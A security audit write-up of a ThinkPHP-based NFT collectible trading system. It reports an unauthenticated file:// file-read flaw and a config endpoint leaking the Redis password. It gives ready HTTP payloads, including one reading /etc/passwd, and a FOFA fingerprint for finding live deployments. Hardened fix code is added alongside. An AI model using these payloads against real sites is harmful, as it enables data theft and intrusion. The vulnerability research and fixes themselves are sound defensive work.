0x00 Preface
Decrypted version of a metaverse NFT trading system / digital-collectible 3D synthesis / airdrop blind-box gameplay with card collecting. This source code is not the encrypted, license-locked version shared on the market: this build was re-developed with Alibaba real-name verification and SMS, and the original encryption and licensing were removed, so installation and use are not affected.
FOFA fingerprint: "./static/js/chunk-vendors.a6c3c211.js" (this kind of front end is usually deployed under a second-level directory, so FOFA cannot find it)
Framework: ThinkPHP 5.0.24, FastAdmin, Debug: True
0x01 Unauthenticated arbitrary file read vulnerability
The toCurl method in the /api/controller/nft/Ants.php controller calls curl_exec, and its url parameter is attacker-controlled, which is what produces the vulnerability.
    /**
     * @Explain : Curl request
     * @param $url
     * @param array $param
     * @return bool|string|string[]
     * @Date : 2022/4/5 7:21 PM
     * @Author : By Jensen
     */
    public static function toCurl($url, $param = array())
    {
        $postUrl = $url;
        $curlPost = $param;
        $ch = curl_init();                                              // initialise cURL
        curl_setopt($ch, CURLOPT_URL, $postUrl);                        // fetch the given URL (no scheme or host check)
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);                    // return the response as a string instead of printing it
        curl_setopt($ch, CURLOPT_POST, 1);                              // submit via POST
        curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Token: ' . self::$Token]);
        $data = curl_exec($ch);                                         // execute the request
        curl_close($ch);
        $data = str_replace('&quot;', '"', $data);                      // decode HTML-encoded quotes in the response
        return $data;
    }
Payload:
GET /api/nft/ants/toCurl?url=file:///etc/passwd HTTP/2
Host: 127.0.0.1:81
Cache-Control: max-age=0
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
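The root cause above is twofold: the helper is a public method on a routable controller (so FastAdmin/ThinkPHP exposes it as an action), and it hands an unvalidated URL to libcurl, which happily speaks file://, gopher://, dict:// and friends. The following is an added example written for this review, not code from the project: a hardened replacement that lives outside any controller (so it has no route), restricts the scheme and host, refuses private address ranges, and pins the resolved address so libcurl connects to exactly the address that was checked. The host allow-list, the class name and the Token handling are assumptions.

```php
<?php
// Added example, not the project's code. Hardened stand-in for the toCurl helper.
// Assumption: this class lives under a non-controller namespace (e.g. a library/
// service directory) so it is not reachable through /api/nft/ants/toCurl.

final class SafeCurl
{
    /** Upstream hosts this helper may contact (assumed values, not from the project). */
    private const ALLOWED_HOSTS = ['api.example-upstream.test'];

    public static function post(string $url, array $param = [], string $token = ''): string
    {
        $parts = parse_url($url);
        if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
            throw new InvalidArgumentException('malformed URL');
        }
        $scheme = strtolower($parts['scheme']);
        $host   = strtolower($parts['host']);

        // 1. Scheme allow-list: rejects file://, gopher://, dict://, php://, ftp://, ...
        if (!in_array($scheme, ['http', 'https'], true)) {
            throw new InvalidArgumentException('scheme not allowed');
        }
        // 2. Host allow-list: this helper exists to talk to one known upstream, not to any URL.
        if (!in_array($host, self::ALLOWED_HOSTS, true)) {
            throw new InvalidArgumentException('host not allowed');
        }
        // 3. Resolve and refuse loopback / private / reserved ranges (SSRF into the LAN).
        //    gethostbynamel() only returns IPv4 records; an AAAA-aware check would use dns_get_record().
        $ips = gethostbynamel($host) ?: [];
        if ($ips === []) {
            throw new InvalidArgumentException('host does not resolve');
        }
        foreach ($ips as $ip) {
            if (filter_var($ip, FILTER_VALIDATE_IP,
                    FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
                throw new InvalidArgumentException('host resolves to a non-public address');
            }
        }
        $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL             => $url,
            CURLOPT_RETURNTRANSFER  => true,
            CURLOPT_POST            => true,
            CURLOPT_POSTFIELDS      => $param,
            CURLOPT_HEADER          => false,
            CURLOPT_HTTPHEADER      => ['Token: ' . $token],
            // 4. Enforce the scheme restriction inside libcurl too, including on redirects,
            //    so a 302 to file:///etc/passwd is refused even if step 1 is ever bypassed.
            CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_FOLLOWLOCATION  => false,
            // 5. Pin the address we validated: closes the DNS-rebinding window between
            //    the check in step 3 and libcurl's own resolution.
            CURLOPT_RESOLVE         => [sprintf('%s:%d:%s', $host, $port, $ips[0])],
            CURLOPT_CONNECTTIMEOUT  => 5,
            CURLOPT_TIMEOUT         => 10,
        ]);
        $data = curl_exec($ch);
        if ($data === false) {
            $err = curl_error($ch);
            curl_close($ch);
            throw new RuntimeException('curl failed: ' . $err);
        }
        curl_close($ch);
        return str_replace('&quot;', '"', $data);
    }
}

// Usage: a file:// URL is rejected at step 1, before any network or file access happens.
try {
    SafeCurl::post('file:///etc/passwd');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Steps 1 and 2 are the actual fix; steps 3 to 5 are defence in depth for the case where the allow-list is later widened to user-supplied hosts. Whatever the helper looks like, the method must not remain `public` on a controller class, since FastAdmin routes every public controller method by name.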
0x02 Unauthenticated sensitive information disclosure vulnerability
The index method in the /api/controller/nft/Index.php controller fetches the nft plugin's configuration through get_addon_config and returns it to the client. The configuration leaks the Redis password, which can lead to further vulnerabilities such as command execution.
    /**
     * Home page
     *
     */
    public function index(): void
    {
        $banner_model = new Banner();
        $banner = $banner_model->field('id, article_id, image,pages')->where('status', 1)->select();
        $config = get_addon_config('nft');   // full addon config, secrets included
        $config = $config['ini'];
        $this->success('请求成功', [
            'banner' => $banner,
            'config' => $config              // returned wholesale to an unauthenticated caller
        ]);
    }
Payload:
GET /api/nft/index HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=719psss6jnv9112q6spakfmt32; md5=201920; visitor_source=http%3A%2F%2F127.0.0.1%3A81%2Findex; think_var=th-th
Host: 127.0.0.1:81
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
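The defect is that the endpoint serialises the whole addon config block to an unauthenticated caller. The fix is to project the config onto an explicit allow-list of keys the front end actually needs, and never to rely on "nothing secret is in there". Below is an added example written for this review, not code from the project or from FastAdmin: a filter function plus a constructed sample config. The key names, the `NFT_PUBLIC_CONFIG_KEYS` list and the sample values are assumptions; the real plugin's keys are not on the page.

```php
<?php
// Added example, not the project's code. Replaces `'config' => $config` in Index::index()
// with an allow-listed projection of get_addon_config('nft')['ini'].
// Assumption: the 'ini' block is a flat key => value array.

/** Keys the public API is permitted to expose (assumed names, not from the plugin). */
const NFT_PUBLIC_CONFIG_KEYS = ['site_name', 'logo', 'customer_service_url'];

/** Key names matching this pattern are never exposed, even if someone adds them to the allow-list. */
const SECRET_KEY_PATTERN = '/pass|pwd|secret|token|key|dsn/i';

function publicAddonConfig(array $config, array $allowedKeys): array
{
    $out = [];
    foreach ($allowedKeys as $key) {
        if (!array_key_exists($key, $config)) {
            continue;                       // missing keys are simply not exposed
        }
        if (preg_match(SECRET_KEY_PATTERN, $key)) {
            // Defence in depth: log the misconfiguration and skip rather than leak.
            error_log("refusing to expose config key '$key' on a public endpoint");
            continue;
        }
        $out[$key] = $config[$key];
    }
    return $out;
}

// Constructed sample of what the 'ini' block might contain (placeholder values only).
$sampleConfig = [
    'site_name'            => 'Demo NFT Market',
    'logo'                 => '/static/logo.png',
    'customer_service_url' => 'https://support.example.test/',
    'redis_host'           => '127.0.0.1',
    'redis_password'       => 'PLACEHOLDER-NOT-A-REAL-PASSWORD',
    'sms_access_key'       => 'PLACEHOLDER-NOT-A-REAL-KEY',
];

// In the controller this becomes:
//   'config' => publicAddonConfig(get_addon_config('nft')['ini'], NFT_PUBLIC_CONFIG_KEYS)
// Only site_name, logo and customer_service_url survive; the Redis and SMS secrets never leave the server.
print_r(publicAddonConfig($sampleConfig, NFT_PUBLIC_CONFIG_KEYS));
```

Two related hardening points follow from the page's own findings: the Redis password should be rotated once it has been served to the public, and the `Debug: True` noted in the preface should be turned off (in ThinkPHP 5 that is `app_debug` in the application config), because debug-mode error pages print request and environment details that extend this same class of leak.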
Tags: code audit, 0day, penetration testing, system, generic, 0day, Xianyu, Zhuanzhuan, RCE
To obtain the NFT digital-collectible system source code, follow the official account and send 240910.
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author and this official account accept no legal or joint liability. Please take note!
Originally published on the WeChat official account 星悦安全: Code audit of a metaverse NFT digital-collectible trading system